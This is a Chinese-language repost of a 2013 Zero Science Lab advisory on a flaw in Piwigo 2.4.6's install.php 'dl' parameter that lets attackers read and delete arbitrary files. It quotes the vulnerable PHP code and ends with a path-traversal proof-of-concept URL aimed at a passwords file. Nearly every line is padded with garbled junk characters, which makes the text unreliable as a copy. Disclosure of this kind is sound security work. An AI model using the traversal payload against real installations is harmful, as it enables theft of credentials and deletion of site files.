Piwigo是用PHP编写的相册脚本。( K9 @8 U) m; R& C! ~$ E8 w0 U8 r
8 h+ a, S! U! b, C3 Z! w
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
; \* J6 | \% U====================================================================. c2 S0 w( }- y5 F
/install.php:. t/ E, T8 ~ L9 v! c
-------------
: @8 r: c5 }+ G* }113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])); t/ {7 H; h# R, m
114: {! \! e! D$ f8 ?8 `
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
# V, ?3 e8 U j% a116: header('Cache-Control: no-cache, must-revalidate');
3 b/ v# S& n# P, o117: header('Pragma: no-cache');' [" ]# o; W; u
118: header('Content-Disposition: attachment; filename="database.inc.php"');
8 R. b2 z4 T' h119: header('Content-Transfer-Encoding: binary');
+ n( Q: p$ ~9 E, U" w& e120: header('Content-Length: '.filesize($filename));, @4 ]( @# Y0 r0 \1 d
121: echo file_get_contents($filename);: W4 T Y8 o6 {2 O( ~/ ]
122: unlink($filename);8 g v, ~& }+ g/ `6 J
123: exit();
# Y) B' \# L) U7 h7 s# R124: }4 ?9 V& h4 R, q+ q/ D; e
====================================================================
+ R, ~# K+ |4 L) q
( ~0 P# A" N- MTested on: Microsoft Windows 7 Ultimate SP1 (EN)1 T: d9 ]2 R/ n7 B& L0 b6 B
Apache 2.4.2 (Win32)2 p7 ~" ]5 s Q; W$ z
PHP 5.4.4
: o( g& u# M; q' s/ ^& C/ c MySQL 5.5.25a
( ~& ^6 V, U: I; y w: h % R. C) | [( I' k
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic2 A8 h" E* u3 Z1 V# d- @6 `; ?0 B( j9 d
@zeroscience7 [2 Q( e; B( }6 o# f3 B) r( F
- J4 I: N l' s9 { FAdvisory ID: ZSL-2013-5127- S, ?; Q' c7 ]% p. v
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
: J' c: r# S8 o; tVendor Patch: http://piwigo.org/bugs/view.php?id=2843
1 I8 M1 ] V, ]2 U1 w
) O9 Y( _; {8 I; {/ y5 C- i0 M' C- u15.02.2013
0 i8 f. u7 E- q 9 o* q. o4 T. n; g$ C5 A1 F6 f% x
--/ e1 r! J( q& u4 D
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
`5 U$ S0 w) ^ : O% a( n0 ~" R" t* L! s
|